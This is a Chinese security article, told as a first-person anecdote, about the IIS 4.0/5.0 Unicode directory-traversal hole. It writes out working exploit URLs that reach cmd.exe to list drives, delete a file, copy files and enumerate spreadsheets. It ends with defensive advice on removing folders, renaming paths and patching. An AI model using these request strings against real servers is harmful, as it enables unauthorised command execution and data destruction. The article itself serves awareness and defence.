服务器安全指南 堵上致命IISUnicode漏洞

　　设置扫描参数

　　他点击工具栏的第二个按钮进入“扫描参数”对话框(图1)，在“指定IP范围”栏中输入局域网IP地址范围是“192.168.0.1-192.168.0.99”。其它可以使用默认。

图1

　　开始扫描

　　他点击工具栏的第三个按钮进行漏洞扫描。检测出IP地址为“192.168.0.15”，我的计算机有许多明显的IISUnicode漏洞。想知道IISUnicode漏洞是什么吗?我简单介绍一下IISUnicode漏洞:微软的IIS4.0和5.0都存在利用扩展Unicode字符取代“/”和“\”从而利用“../”目录遍历的漏洞。未经授权的用户可能利用IUSR_machinename账号进行入侵。该账号在默认情况下属于Everyone和Users组的成员，因此任何与Web根目录在同一逻辑驱动器上并能被这些用户组访问的文件都能被删除、修改或执行，就如同一个用户成功登陆后所能完成的一样。

　　入侵我的计算机

　　他可能出于好奇，在IE浏览器的地址栏中输入“http://192.168.0.15/msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c dir c:\”，立刻显示出了我计算机(IP地址为“192.168.0.15”)的C盘所有的文件和目录(图3)，太刺激了!他又将“c:\”换成“d:\”、“e:\”,都能成功地显示各盘符下所有文件和目录，他心中开始涌动着要当“黑客”的念头。他想删除我计算机上的文件?试着输入“http://192.168.0.15/msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c del c:\aa.txt”,果然刷新一下图2命令，文件没了。想复制文件并改名，他输入“http://192.168.0.15/msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c copy c:\aa.fon c:\unzipped\bad.fon”,如图3所示换名复制成功。

图2

图3

　　他还想显示某一路径下相同文件类型的文件内容，输入“http://192.168.0.15/msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c dir d:\*.xls”列出了D盘根目录下所有的excel文件(图4)。哈哈，他已完全控制了我的计算机，想干什么就干什么。能给我个提示，就算不错了。

图4

　　通过这个真实事例，我们可以看到，IISUNICODE漏洞虽然出现了很久了，但是很多象我一样大意的用户根本没有取消IIS服务和打上补丁的安全防范意识，其实防范IISUnicode漏洞最简单的方法就是限制网络用户访问和调用CMD的权限，在Scripts、Msadc目录没必要使用的情况下，尽量删除这些文件夹或者干脆换名。安装NT系统时尽量不要使用默认的win nt路径，改成自己喜欢的名字。再则还可以安装上SP4补丁程序，很多漏洞就会不复存在了。此外平时还要勤于升级，如果觉得每天上网去打补丁太麻烦的话，可以将WINDOWS Updata设定为自动，那么系统一但连上互联网后就会自动查找最新补丁，你要做的就仅仅是确定安装而已，非常方便。“亡羊补牢，为未晚已”，IISUnicode漏洞今天您堵上了吗?